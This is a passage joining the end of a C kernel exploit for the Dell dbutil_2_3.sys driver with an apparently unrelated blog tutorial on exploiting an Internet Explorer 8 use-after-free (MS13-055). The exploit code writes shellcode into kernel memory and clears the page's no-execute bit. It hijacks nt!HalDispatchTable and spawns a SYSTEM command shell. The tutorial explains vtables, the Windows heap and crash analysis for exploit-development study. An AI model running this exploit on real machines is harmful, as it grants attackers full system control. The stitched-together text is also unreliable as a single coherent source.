				BOOL interact7 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf8,
					sizeof(inBuf8),
					&inBuf8,
					sizeof(inBuf8),
					&bytesReturned8,
					NULL
				);

				BOOL interact8 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf9,
					sizeof(inBuf9),
					&inBuf9,
					sizeof(inBuf9),
					&bytesReturned9,
					NULL
				);

				BOOL interact9 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf10,
					sizeof(inBuf10),
					&inBuf10,
					sizeof(inBuf10),
					&bytesReturned10,
					NULL
				);

				BOOL interact10 = DeviceIoControl(
					driverHandle,
					IOCTL_WRITE_CODE,
					&inBuf11,
					sizeof(inBuf11),
					&inBuf11,
					sizeof(inBuf11),
					&bytesReturned11,
					NULL
				);

				// A lot of error handling
				if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
				{
					printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
					exit(-1);
				}
				else
				{
					printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

					// Clear the no-eXecute bit
					unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

					printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

					// Clear the no-eXecute bit in the actual PTE
					// Buffer to send to the driver (write primitive)
					unsigned long long inBuf13[4];

					// Values to send
					unsigned long long one13 = 0x4141414141414141;
					unsigned long long two13 = shellcodePte;
					unsigned long long three13 = 0x0000000000000000;
					unsigned long long four13 = taintedPte;

					// Assign the values
					inBuf13[0] = one13;
					inBuf13[1] = two13;
					inBuf13[2] = three13;
					inBuf13[3] = four13;


					// Interact with the driver
					DWORD bytesReturned13 = 0;

					BOOL interact12 = DeviceIoControl(
						driverHandle,
						IOCTL_WRITE_CODE,
						&inBuf13,
						sizeof(inBuf13),
						&inBuf13,
						sizeof(inBuf13),
						&bytesReturned13,
						NULL
					);

					// Error handling
					if (!interact12)
					{
						printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
					}
					else
					{
						printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

						// Offset to nt!HalDispatchTable+0x8
						unsigned long long halDispatch = baseofKernel + 0x427258;

						// Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
						// Buffer to send to the driver (write primitive)
						unsigned long long inBuf14[4];

						// Values to send
						unsigned long long one14 = 0x4141414141414141;
						unsigned long long two14 = halDispatch;
						unsigned long long three14 = 0x0000000000000000;
						unsigned long long four14 = 0x0000000000000000;

						// Assign the values
						inBuf14[0] = one14;
						inBuf14[1] = two14;
						inBuf14[2] = three14;
						inBuf14[3] = four14;

						// Interact with the driver
						DWORD bytesReturned14 = 0;

						BOOL interact13 = DeviceIoControl(
							driverHandle,
							IOCTL_READ_CODE,
							&inBuf14,
							sizeof(inBuf14),
							&inBuf14,
							sizeof(inBuf14),
							&bytesReturned14,
							NULL
						);

						// Error handling
						if (!interact13)
						{
							printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
						}
						else
						{
							// Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
							unsigned long long preservedHal = inBuf14[3];

							printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

							// Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
							// Buffer to send to the driver (write primitive)
							unsigned long long inBuf15[4];

							// Values to send
							unsigned long long one15 = 0x4141414141414141;
							unsigned long long two15 = halDispatch;
							unsigned long long three15 = 0x0000000000000000;
							unsigned long long four15 = shellcodeLocation;

							// Assign the values
							inBuf15[0] = one15;
							inBuf15[1] = two15;
							inBuf15[2] = three15;
							inBuf15[3] = four15;

							// Interact with the driver
							DWORD bytesReturned15 = 0;

							BOOL interact14 = DeviceIoControl(
								driverHandle,
								IOCTL_WRITE_CODE,
								&inBuf15,
								sizeof(inBuf15),
								&inBuf15,
								sizeof(inBuf15),
								&bytesReturned15,
								NULL
							);

							// Error handling
							if (!interact14)
							{
								printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
							}
							else
							{
								printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

								// Locating nt!NtQueryIntervalProfile
								NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
									GetModuleHandle(
										TEXT("ntdll.dll")),
									"NtQueryIntervalProfile"
								);

								// Error handling
								if (!NtQueryIntervalProfile)
								{
									printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
									exit(1);
								}
								else
								{
									// Print update for found ntdll!NtQueryIntervalProfile
									printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

									// Calling nt!NtQueryIntervalProfile
									ULONG exploit = 0;

									NtQueryIntervalProfile(
										0x1234,
										&exploit
									);

									// Restoring nt!HalDispatchTable+0x8
									// Buffer to send to the driver (write primitive)
									unsigned long long inBuf16[4];

									// Values to send
									unsigned long long one16 = 0x4141414141414141;
									unsigned long long two16 = halDispatch;
									unsigned long long three16 = 0x0000000000000000;
									unsigned long long four16 = preservedHal;

									// Assign the values
									inBuf16[0] = one16;
									inBuf16[1] = two16;
									inBuf16[2] = three16;
									inBuf16[3] = four16;

									// Interact with the driver
									DWORD bytesReturned16 = 0;

									BOOL interact15 = DeviceIoControl(
										driverHandle,
										IOCTL_WRITE_CODE,
										&inBuf16,
										sizeof(inBuf16),
										&inBuf16,
										sizeof(inBuf16),
										&bytesReturned16,
										NULL
									);

									// Error handling
									if (!interact15)
									{
										printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
									}
									else
									{
										printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
										printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

										// Spawning an NT AUTHORITY\SYSTEM shell
										system("cmd.exe /c cmd.exe /K cd C:\\");
									}
								}
							}
						}
					}
				}
			}
		}
	}
}

// Call exploitWork()
void main(void)
{
	exploitWork();
}

Exploit Development: Browser Exploitation on Windows - Understanding Use-After-Free Vulnerabilities

21 April 2021 at 00:00

Introduction

Browser exploitation is a topic that has been incredibly daunting for myself. Looking back at my journey over the past year and a half or so since I started to dive into binary exploitation, specifically on Windows, I remember experiencing this same feeling with kernel exploitation. I can still remember one day just waking up and realizing that I just need to just dive into it if I ever wanted to advance my knowledge. Looking back, although I still have tons to learn about it and am still a novice at kernel exploitation, I realized it was my will to just jump in, irrespective of the difficulty level, that helped me to eventually grasp some of the concepts surrounding more modern kernel exploitation.

Browser exploitation has always been another fear of mine, even more so than the Windows kernel, due to the fact not only do you need to understand overarching exploit primitives and vulnerability classes that are specific to Windows, but also needing to understand other topics such as the different JavaScript engines, just-in-time (JIT) compilers, and a plethora of other subjects, which by themselves are difficult (at least to me) to understand. Plus, the addition of browser specific mitigations is also something that has been a determining factor in myself putting off learning this subject.

What has always been frightening, is the lack (in my estimation) of resources surrounding browser exploitation on Windows. Many people can just dissect a piece of code and come up with a working exploit within a few hours. This is not the case for myself. The way I learn is to take a POC, along with an accompanying blog, and walk through the code in a debugger. From there I analyze everything that is going on and try to ask myself the question “Why did the author feel it was important to mention X concept or show Y snippet of code?”, and to also attempt to answer that question. In addition to that, I try to first arm myself with the prerequisite knowledge to even begin the exploitation process (e.g. “The author mentioned this is a result of a fake virtual function table. What is a virtual function table in the first place?”). This helps me to understand the underlying concepts. From there, I am able to take other POCs that leverage the same vulnerability classes and weaponize them - but it takes that first initial walkthrough for myself.

Since this is my learning style, I have found that blogs on Windows browser exploitation which start from the beginning are very sparse. Since I use blogging as a mechanism not only to share what I know, but to reinforce the concepts I am attempting to hit home, I thought I would take a few months, now with Advanced Windows Exploitation (AWE) being canceled again for 2021, to research browser exploitation on Windows and to talk about it.

Please note that what is going to be demonstrated here, is not heap spraying as an execution method. These will be actual vulnerabilities that are exploited. However, it should also be noted that this will start out on Internet Explorer 8, on Windows 7 x86. We will still outline leveraging code-reuse techniques to bypass DEP, but don’t expect MemGC, Delay Free, etc. to be enabled for this tutorial, and most likely for the next few. This will simply be a documentation of my thought process, should you care, of how I went from crash to vulnerability identification, and hopefully to a shell in the end.

Understanding Use-After-Free Vulnerabilities

As was aforesaid above, the vulnerability we will be taking a look at is a use-after-free. More specifically, MS13-055, which is titled as Microsoft Internet Explorer CAnchorElement Use-After-Free. What exactly does this mean? Use-after-free vulnerabilities are well documented, and fairly common. There are great explanations out there, but for brevity and completeness sake I will take a swing at explaining them. Essentially what happens is this - a chunk of memory (chunks are just contiguous pieces of memory, like a buffer. Each piece of memory, known as a block, on x86 systems are 0x8 bytes, or 2 DWORDS. Don’t over-think them) is allocated by the heap manager (on Windows there is the front-end allocator, known as the Low-Fragmentation Heap, and the standard back-end allocator. We will talk about these in the a future section). At some point during the program’s lifetime, this chunk of memory, which was previously allocated, is “freed”, meaning the allocation is cleaned up and can be re-used by the heap manager again to service allocation requests.

Let’s say the allocation was at the memory address 0x15000. Let’s say the chunk, when it was allocated, contained 0x40 bytes of 0x41 characters. If we dereferenced the address 0x15000, you could expect to see 0x41s (this is psuedo-speak and should just be taken at a high level for now). When this allocation is freed, if you go back and dereference the address again, you could expect to see invalid memory (e.g. something like ???? in WinDbg), if the address hasn’t been used to service any allocation requests, and is still in a free state.

Where the vulnerability comes in is the chunk, which was allocated but is now freed, is still referenced/leveraged by the program, although in a “free” state. This usually causes a crash, as the program is attempting to either access and/or dereference memory that simply isn’t valid anymore. This usually causes some sort of exception, resulting in a program crash.

Now that the definition of what we are attempting to take advantage of is out of the way, let’s talk about how this condition arises in our specific case.

C++ Classes, Constructors, Destructors, and Virtual Functions

You may or may not know that browsers, although they interpret/execute JavaScript, are actually written in C++. Due to this, they adhere to C++ nomenclature, such as implementation of classes, virtual functions, etc. Let’s start with the basics and talk about some foundational C++ concepts.

A class in C++ is very similar to a typical struct you may see in C. The difference is, however, in classes you can define a stricter scope as to where the members of the class can be accessed, with keywords such as private or public. By default, members of classes are private, meaning the members can only be accessed by the class and by inherited classes. We will talk about these concepts in a second. Let’s give a quick code example.

#include <iostream>
using namespace std;

// This is the main class (base class)
class classOne
{
	public:

		// This is our user defined constructor
		classOne()
		{
			cout << "Hello from the classOne constructor" << endl;
		}

		// This is our user defined destructor
		~classOne()
		{
			cout << "Hello from the classOne destructor!" << endl;
		}

	public:
		virtual void sharedFunction(){};				// Prototype a virtual function
		virtual void sharedFunction1(){};				// Prototype a virtual function
};

// This is a derived/sub class
class classTwo : public classOne
{
	public:

		// This is our user defined constructor
		classTwo()
		{
			cout << "Hello from the classTwo constructor!" << endl;
		};

		// This is our user defined destructor
		~classTwo()
		{
			cout << "Hello from the classTwo destructor!" << endl;
		};

	public:
		void sharedFunction() 							
		{
			cout << "Hello from the classTwo sharedFunction()!" << endl;		// Create A DIFFERENT function definition of sharedFunction()
		};

		void sharedFunction1()
		{
			cout << "Hello from the classTwo sharedFunction1()!" << endl;		// Create A DIFFERENT function definition of sharedFunction1()
		};
};

// This is another derived/sub class
class classThree : public classOne
{
	public:

		// This is our user defined constructor
		classThree()
		{
			cout << "Hello from the classThree constructor" << endl;
		};

		// This is our user defined destructor
		~classThree()
		{
			cout << "Hello from the classThree destructor!" << endl;
		};
	
	public:
		void sharedFunction()
		{
			cout << "Hello from the classThree sharedFunction()!" << endl; 	// Create A DIFFERENT definition of sharedFunction()
		};

		void sharedFunction1()
		{
			cout << "Hello from the classThree sharedFunction1()!" << endl; 	// Create A DIFFERENT definition of sharedFunction1()
		};
};

// Main function
int main()
{
	// Create an instance of the base/main class and set it to one of the derivative classes
	// Since classTwo and classThree are sub classes, they inherit everything classOne prototypes/defines, so it is acceptable to set the address of a classOne object to a classTwo object
	// The class 1 constructor will get called twice (for each classOne object created), and the classTwo + classThree constructors are called once each (total of 4)
	classOne* c1 = new classTwo;
	classOne* c1_2 = new classThree;

	// Invoke the virtual functions
	c1->sharedFunction();
	c1_2->sharedFunction();
	c1->sharedFunction1();
	c1_2->sharedFunction1();

	// Destructors are called when the object is explicitly destroyed with delete
	delete c1;
	delete c1_2;
}

The above code creates three classes: one “main”, or “base” class (classOne) and then two classes which are “derivative”, or “sub” classes of the base class classOne. (classTwo and classThree are the derivative classes in this case).

Each of the three classes has a constructor and a destructor. A constructor is named the same as the class, as is proper nomenclature. So, for instance, a constructor for class classOne is classOne(). Constructors are essentially methods that are called when an object is created. Its general purpose is that they are used so that variables can be initialized within a class, whenever a class object is created. Just like creating an object for a structure, creating a class object is done as such: classOne c1. In our case, we are creating objects that point to a classOne class, which is essentially the same thing, but instead of accessing members directly, we access them via pointers. Essentially, just know that whenever a class object is created (classOne* cl in our case), the constructor is called when creating this object.

In addition to each constructor, each class also has a destructor. A destructor is named ~nameoftheClass(). A destructor is something that is called whenever the class object, in our case, is about to go out of scope. This could be either code reaching the end of execution or, as is in our case, the delete operator is invoked against one of the previously declared class objects (cl and cl_2). The destructor is the inverse of the constructor - meaning it is called whenever the object is being deleted. Note that a destructor does not have a type, does not accept function arguments, and does not return a value.

In addition to the constructor and destructor, we can see that classOne prototypes two “virtual functions”, with empty definitions. Per Microsoft’s documentation, a virtual function is “A member function that you expect to be redefined in a derived class”. If you are not innately familiar with C++, as I am not, you may be wondering what a member function is. A member function, simply put, is just a function that is defined in a class, as a member. Here is an example struct you would typically see in C:

struct mystruct{
	int var1;
	int var2;
}

As you know, the first member of this struct is int var1. The same bodes true with C++ classes. A function that is defined in a class is also a member, hence the term “member function”.

The reason virtual functions exists, is it allows a developer to prototype a function in a main class, but allows for the developer to redefine the function in a derivative class. This works because the derivative class can inherit all of the variables, functions, etc. from its “parent” class. This can be seen in the above code snippet, placed here for brevity: classOne* c1 = new classTwo;. This takes a derivative class of classOne, which is classTwo, and points the classOne object (c1) to the derivative class. It ensures that whenever an object (e.g. c1) calls a function, it is the correctly defined function for that class. So basically think of it as a function that is declared in the main class, is inherited by a sub class, and each sub class that inherits it is allowed to change what the function does. Then, whenever a class object calls the virtual function, the corresponding function definition, appropriate to the class object invoking it, is called.

Running the program, we can see we acquire the expected result:

Now that we have armed ourselves with a basic understanding of some key concepts, mainly constructors, destructors, and virtual functions, let’s take a look at the assembly code of how a virtual function is fetched.

Note that it is not necessary to replicate these steps, as long as you are following along. However, if you would like to follow step-by-step, the name of this .exe is virtualfunctions.exe. This code was compiled with Visual Studio as an “Empty C++ Project”. We are building the solution in Debug mode. Additionally, you’ll want to open up your code in Visual Studio. Make sure the program is set to x64, which can be done by selecting the drop down box next to Local Windows Debugger at the top of Visual Studio.

Before compiling, select Project > nameofyourproject Properties. From here, click C/C++ and click on All Options. For the Debug Information Format option, change the option to Program Database /Zi.

After you have completed this, follow these instructions from Microsoft on how to set the linker to generate all the debug information that is possible.

Now, build the solution and then fire up WinDbg. Open the .exe in WinDbg (note you are not attaching, but opening the binary) and execute the following command in the WinDbg command window: .symfix. This will automatically configure debugging symbols properly for you, allowing you to resolve function names not only in virtualfunctions.exe, but also in Windows DLLs. Then, execute the .reload command to refresh your symbols.

After you have done this, save the current workspace with File > Save Workspace. This will save your symbol resolution configuration.

For the purposes of this vulnerability, we are mostly interested the virtual function table. With that in mind, let’s set a breakpoint on the main function with the WinDbg command bp virtualfunctions!main. Since we have the source file at our disposal, WinDbg will automatically generate a View window with the actual C code, and will walk through the code as you step through it.

In WinDbg, step through the code with t to until we hit c1->sharedFunction().

After reaching the beginning of the virtual function call, let’s set breakpoints on the next three instructions after the instruction in RIP. To do this, leverage bp 00007ff7b67c1703, etc.

Stepping into the next instruction, we can see that the value pointed to by RAX is going to be moved into RAX. This value, according to WinDbg, is virtualfunctions!classTwo::vftable.

As we can see, this address is a pointer to the “vftable” (a virtual function table pointer, or vptr). A vftable is a virtual function table, and it essentially is a structure of pointers to different virtual functions. Recall earlier how we said “when a class calls a virtual function, the program will know which function corresponds to each class object”. This is that process in action. Let’s take a look at the current instruction, plus the next two.

You may not be able to tell it now, but this sort of routine (e.g. mov reg, [ptr] + call [ptr]) is indicative of a specific virtual function being fetched from the virtual function table. Let’s walk through now to see how this is working. Stepping through the call, the vptr (which is a pointer to the table), is loaded into RAX. Let’s take a look at this table now.

Although these symbols are a bit confusing, notice how we have two pointers here - one is ?sharedFunctionclassTwo and the other is ?sharedFunction1classTwo. These are actually pointers to the two virtual functions within classTwo!

If we step into the call, we can see this is a call that redirects to a jump to the sharedFunction virtual function defined in classTwo!

Next, keep stepping into instructions in the debugger, until we hit the c1->sharedFunction1() instruction. Notice as you are stepping, you will eventually see the same type of routine done with sharedFunction within classThree.

Again, we can see the same type of behavior, only this time the call instruction is call qword ptr [rax+0x8]. This is because of the way virtual functions are fetched from the table. The expertly crafted Microsoft Paint chart below outlines how the program indexes the table, when there are multiple virtual functions, like in our program.

As we recall from a few images ago, where we dumped the table and saw our two virtual function addresses. We can see that this time program execution is going to invoke this table at an offset of 0x8, which is a pointer to sharedFunction1 instead of sharedFunction this time!

Stepping through the instruction, we hit sharedFunction1.

After all of the virtual functions have executed, our destructor will be called. Since we only created two classOne objects, and we are only deleting those two objects, we know that only the classOne destructor will be called, which is evident by searching for the term “destructor” in IDA. We can see that the j_operator_delete function will be called, which is just a long and drawn out jump thunk to the UCRTBASED Windows API function _free_dbg, to destroy the object. Note that this would normally be a call to the C Runtime function free, but since we built this program in debug mode, it defaults to the debug version.

Great! We now know how C++ classes index virtual function tables to retrieve virtual functions associated with a given class object. Why is this important? Recall this will be a browser exploit, and browsers are written in C++! These class objects, which almost certainly will use virtual functions, are allocated on the heap! This is very useful to us.

Before we move on to our exploitation path, let’s take just a few extra minutes to show what a use-after-free potentially looks like, programmatically. Let’s add the following snippet of code to the main function:

// Main function
int main()
{
	classOne* c1 = new classTwo;
	classOne* c1_2 = new classThree;

	c1->sharedFunction();
	c1_2->sharedFunction();

	delete c1;
	delete c1_2;

	// Creating a use-after-free situation. Accessing a member of the class object c1, after it has been freed
	c1->sharedFunction();
}

Rebuild the solution. After rebuilding, let’s set WinDbg to be our postmortem debugger. Open up a cmd.exe session, as an administrator, and change the current working directory to the installation of WinDbg. Then, enter windbg.exe -I.

This command configured WinDbg to automatically attach and analyze a program that has just crashed. The above addition of code should cause our program to crash.

Additionally, before moving on, we are going to turn on a feature of the Windows SDK known as gflags.exe. glfags.exe, when leveraging its PageHeap functionality, provides extremely verbose debugging information about the heap. To do this, in the same directory as WinDbg, enter the following command to enable PageHeap for our process gflags.exe /p /enable C:\Path\To\Your\virtualfunctions.exe. You can read more about PageHeap here and here. Essentially, since we are dealing with memory that is not valid, PageHeap will aid us in still making sense of things, by specifying “patterns” on heap allocations. E.g. if a page is free, it may fill it with a pattern to let you know it is free, rather than just showing ??? in WinDbg, or just crashing.

Run the .exe again, after adding the code, and WinDbg should fire up.

After enabling PageHeap, let’s run the vulnerable code. (Note you may need to right click the below image and open it in a new tab)

Very interesting, we can see a crash has occurred! Notice the call qword ptr [rax] instruction we landed on, as well. First off, this is a result of PageHeap being enabled, meaning we can see exactly where the crash occurred, versus just seeing a standard access violation. Recall where you have seen this? This looks to be an attempted function call to a virtual function that does not exist! This is because the class object was allocated on the heap. Then, when delete is called to free the object and the destructor is invoked, it destroys the class object. That is what happened in this case - the class object we are trying to call a virtual function from has already been freed, so we are calling memory that isn’t valid.

What if we were able to allocate some heap memory in place of the object that was freed? Could we potentially control program execution? That is going to be our goal, and will hopefully result in us being able to get stack control and obtain a shell later. Lastly, let’s take a few moments to familiarize ourself with the Windows heap, before moving on to the exploitation path.

The Windows Heap Manager - The Low Fragmentation Heap (LFH), Back-End Allocator, and Default Heaps

tl;dr -The best explanation of the LFH, and just heap management in general on Windows, can be found at this link. Chris Valasek’s paper on the LFH is the de facto standard on understanding how the LFH works and how it coincides with the back-end manager, and much, if not all, of the information provided here, comes from there. Please note that the heap has gone through several minor and major changes since Windows 7, and it should be considered techniques leveraging the heap internals here may not be directly applicable to Windows 10, or even Windows 8.

It should be noted that heap allocations start out technically by querying the front-end manager, but since the LFH, which is the front-end manager on Windows, is not always enabled - the back-end manager ends up being what services requests at first.

A Windows heap is managed by a structure known as HeapBase, or ntdll!_HEAP. This structure contains many members to get/provide applicable information about the heap.

The ntdll!_HEAP structure contains a member called BlocksIndex. This member is of type _HEAP_LIST_LOOKUP, which is a linked-list structure. (You can get a list of active heaps with the !heap command, and pass the address as an argument to dt ntdll_HEAP). This structure is used to hold important information to manage free chunks, but does much more.

Next, here is what the HeapBase->BlocksIndex (_HEAP_LIST_LOOKUP)structure looks like.

The first member of this structure is a pointer to the next _HEAP_LIST_LOOKUP structure in line, if there is one. There is also an ArraySize member, which defines up to what size chunks this structure will track. On Windows 7, there are only two sizes supported, meaning this member is either 0x80, meaning the structure will track chunks up to 1024 bytes, or 0x800, which means the structure will track up to 16KB. This also means that for each heap, on Windows 7, there are technically only two of these structures - one to support the 0x80 ArraySize and one to support the 0x800 ArraySize.

HeapBase->BlocksIndex, which is of type _HEAP_LIST_LOOKUP, also contains a member called ListHints, which is a pointer into the FreeLists structure, which is a linked-list of pointers to free chunks available to service requests. The index into ListHints is actually based on the BaseIndex member, which builds off of the size provided by ArraySize. Take a look at the image below, which instruments another _HEAP_LIST_LOOKUP structure, based on the ExtendedLookup member of the first structure provided by ntdll!_HEAP.

For example, if ArraySize is set to 0x80, as is seen in the first structure, the BaseIndex member is 0, because it manages chunks 0x0 - 0x80 in size, which is the smallest size possible. Since this screenshot is from Windows 10, we aren’t limited to 0x80 and 0x800, and the next size is actually 0x400. Since this is the second smallest size, the BaseIndex member is increased to 0x80, as now chunks sizes 0x80 - 0x400 are being addressed. This BaseIndex value is then used, in conjunction with the target allocation size, to index ListHints to obtain a chunk for servicing an allocation. This is how ListHints, a linked-list, is indexed to find an appropriately sized free chunk for usage via the back-end manager.

What is interesting to us is that the BLINK (back link) of this structure, ListHints, when the front-end manager is not enabled, is actually a pointer to a counter. Since ListHints will be indexed based on a certain chunk size being requested, this counter is used to keep track of allocation requests to that certain size. If 18 consecutive allocations are made to the same chunk size, this enables the LFH.

To be brief about the LFH - the LFH is used to service requests that meet the above heuristics requirements, which is 18 consecutive allocations to the same size. Other than that, the back-end allocator is most likely going to be called to try to service requests. Triggering the LFH in some instances is useful, but for the purposes of our exploit, we will not need to trigger the LFH, as it will already be enabled for our heap. Once the LFH is enabled, it stays on by default. This is useful for us, as now we can just create objects to replace the freed memory. Why? The LFH is also LIFO on Windows 7, like the stack. The last deallocated chunk is the first allocated chunk in the next request. This will prove useful later on. Note that this is no longer the case on more updated systems, and the heap has a greater deal of randomization.

In any event, it is still worth talking about the LFH in its entierty, and especially the heap on Windows. The LFH essentially optimizes the way heap memory is distributed, to avoid breaking, or fragmenting memory into non-contiguous blocks, so that almost all requests for heap memory can be serviced. Note that the LFH can only address allocations up to 16KB. For now, this is what we need to know as to how heap allocations are serviced.

Now that we have talked about the different heap manager, let’s talk about usage on Windows.

Processes on Windows have at least one heap, known as the default process heap. For most applications, especially those smaller in size, this is more than enough to provide the applicable memory requirements for the process to function. By default it is 1 MB, but applications can extend their default heaps to bigger sizes. However, for more memory intensive applications, additional algorithms are in play, such as the front-end manager. The LFH is the front-end manager on Windows, starting with Windows 7.

In addition to the aforesaid heaps/heap managers, there is also a segment heap, which was added with Windows 10. This can be read about here.

Please note that this explanation of the heap can be more integrally explained by Chris’ paper, and the above explanations are not a comprehensive list, are targeted more towards Windows 7, and are listed simply for brevity and because they are applicable to this exploit.

The Vulnerability And Exploitation Strategy

Now that we have talked about C++ and heap behaviors on Windows, let’s dive into the vulnerability itself. The full exploit script is available on the Exploit-DB, by way of the Metasploit team, and if you are confused by the combination of Ruby and HTML/JavaScript, I have gone ahead and stripped down the code to “the trigger code”, which causes a crash.

Going back over the vulnerability, and reading the description, this vulnerability arises when a CPhraseElement comes after a CTableRow element, with the final node being a sub-table element. This may seem confusing and illogical at first, and that is because it is. Don’t worry so much about the order of the code first, as to the actual root cause, which is that when a CPhraseElement’s outerText property is reset (freed). However, after this object has been freed, a reference still remains to it within the C++ code. This reference is then passed down to a function that will eventually try to fetch a virtual function for the object. However, as we saw previously, accessing a virtual function for a freed object will result in a crash - and this is what is happening here. Additionally, this vulnerability was published at HitCon 2013. You can view the slides here, which contains a similar proof of concept above. Note that although the elements described are not the same name as the elements in the HTML, note that when something like CPhraseElement is named, it refers to the C++ class that manages a certain object. So for now, just focus on the fact we have a JavaScript function that essentially creates an element, and then sets the outerText property to NULL, which essentially will perform a “free”.

So, let’s get into the crash. Before starting, note that this is all being done on a Windows 7 x86 machine, Service Pack 0. Additionally, the browser we are focusing on here is Internet Explorer 8. In the event the Windows 7 x86 machine you are working on has Internet Explorer 11 installed, please make sure you uninstall it so browsing defaults to Internet Explorer 8. A simple Google search will aid you in removing IE11. Additionally, you will need WinDbg to debug. Please use the Windows SDK version 8 for this exploit, as we are on Windows 7. It can be found here.

After saving the code as an .html file, opening it in Internet Explorer reveals a crash, as is expected.

Now that we know our POC will crash the browser, let’s set WinDbg to be our postmortem debugger, identically how we did earlier, to identify if we can’t see why this crash ensued.

Running the POC again, we can see that our crash registered in WinDbg, but it seems to be nonsensical.

We know, according the advisory, this is a use-after-free condition. We also know it is the result of fetching a virtual function from an object that no longer exists. Knowing this, we should expect to see some memory being dereferenced that no longer exists. This doesn’t appear to be the case, however, and we just see a reference to invalid memory. Recall earlier when we turned on PageHeap! We need to do the same thing here, and enable PageHeap for Internet Explorer. Leverage the same command from earlier, but this time specify iexplore.exe.

After enabling PageHeap, let’s rerun the POC.

Interesting! The instruction we are crashing on is from the class CElement. Notice the instruction the crash occurs on is mov reg, dword ptr[eax+70h]. If we unsassembly the current instruction pointer, we can see something that is very reminiscent of our assembly instructions we showed earlier to fetch a virtual function.

Recall last time, on our 64-bit system, the process was to fetch the vptr, or pointer to the virtual function table, and then to call what this pointer points to, at a specific offset. Dereferencing the vptr, at an offset of 0x8, for instance, would take the virtual function table and then take the second entry (entry 1 is 0x0, entry 2 is 0x8, entry 3 would be 0x18, entry 4 would be 0x18, and so on) and call it.

However, this methodology can look different, depending on if you are on a 32-bit system or a 64-bit system, and compiler optimization can change this as well, but the overarching concept remains. Let’s now take a look at the above image.

What is happening here is the a fetching of the vptr via [ecx]. The vptr is loaded into ECX and then is dereferenced, storing the pointer into EAX. The EAX register, which now contains the pointer to the virtual function table, is then going to take the pointer, go 0x70 bytes in, and dereference the address, which would be one of the virtual functions (which ever function is stored at virtual_function_table + 0x70)! The virtual function is placed into EDX, and then EDX is called.

Notice how we are getting the same result as our simple program earlier, although the assembly instructions are just slightly different? Looking for these types of routines are very indicative of a virtual function being fetched!

Before moving on, let’s recall a former image.

Notice the state of EAX whenever the function crashes (right under the Access Violation statement). It seems to have a pattern of sorts f0f0f0f0. This is the gflags.exe pattern for “a freed allocation”, meaning the value in EAX is in a free state. This makes sense, as we are trying to index an object that simply no longer exists!

Rerun the POC, and when the crash occurs let’s execute the following !heap command: !heap -p -a ecx.

Why ECX? As we know, the first thing the routine for fetching a virtual function does is load the vptr into EAX, from ECX. Since this is a pointer to the table, which was allocated by the heap, this is technically a pointer to the heap chunk. Even though the memory is in a free state, it is still pointed to by the value [ecx] in this case, which is the vptr. It is only until we dereference the memory can we see this chunk is actually invalid.

Moving on, take a look at the call stack we can see the function calls that led up to the chunk being freed. In the !heap command, -p is to use a PageHeap option, and -a is to dump the entire chunk. On Windows, when you invoke something such as a C Runtime function like free, it will eventually hand off execution to a Windows API. Knowing this, we know that the “lowest level” (e.g. last) function call within a module to anything that resembles the word “free” or “destructor” is responsible for the freeing. For instance, if we have an .exe named vulnexe, and vulnexe calls free from the MSVCRT library (the Microsoft C Runtime library), it will actually eventually hand off execution to KERNELBASE!HeapFree, or kernel32!HeapFree, depending on what system you are on. The goal now is to identify such behavior, and to determine what class actually is handling the free that is responsible for freeing the object (note this doesn’t necessarily mean this is the “vulnerable piece of code”, it just means this is where the free occurs).

Note that when analyzing call stacks in WinDbg, which is simply a list of function calls that have resulted to where execution currently resides, the bottom function is where the start is, and the top is where execution currently is/ended up. Analyzing the call stack, we can see that the last call before kernel32 or ntdll is hit, is from the mshtml library, and from the CAnchorElement class. From this class, we can see the destructor is what kicks off the freeing. This is why the vulnerability contains the words CAnchorElement Use-After-Free!

Awesome, we know what is causing the object to be freed! Per our earlier conversation surrounding our overarching exploitation strategy, we could like to try and fill the invalid memory with some memory we control! However, we also talked about the heap on Windows, and how different structures are responsible for determining which heap chunk is used to service an allocation. This heavily depends on the size of the allocation.

In order for us to try and fill up the freed chunk with our own data, we first need to determine what the size of the object being freed is, that way when we allocate our memory, it will hopefully be used to fill the freed memory slot, since we are giving the browser an allocation request of the exact same size as a chunk that is currently freed (recall how the heap tries to leverage existing freed chunks on the back-end before invoking the front-end).

Let’s step into IDA for a moment to try to reverse engineer exactly how big this chunk is, so that way we can fill this freed chunk with out own data.

We know that the freeing mechanism is the destructor for the CAnchorElement class. Let’s search for that in IDA. To do this, download IDA Freeware for Windows on a second Windows machine that is 64-bit, and preferably Windows 10. Then, take mshtml.dll, which is found in C:\Windows\system32 on the Windows 7 exploit development machine, copy it over to the Windows machine with IDA on it, and load it. Note that there may be issues with getting the proper symbols in IDA, since this is an older DLL from Windows 7. If that is the case, I suggest looking at PDB Downloader to quickly obtain the symbols locally, and import the .pdb files manually.

Now, let’s search for the destructor. We can simply search for the class CAnchorElement and look for any functions that contain the word destructor.

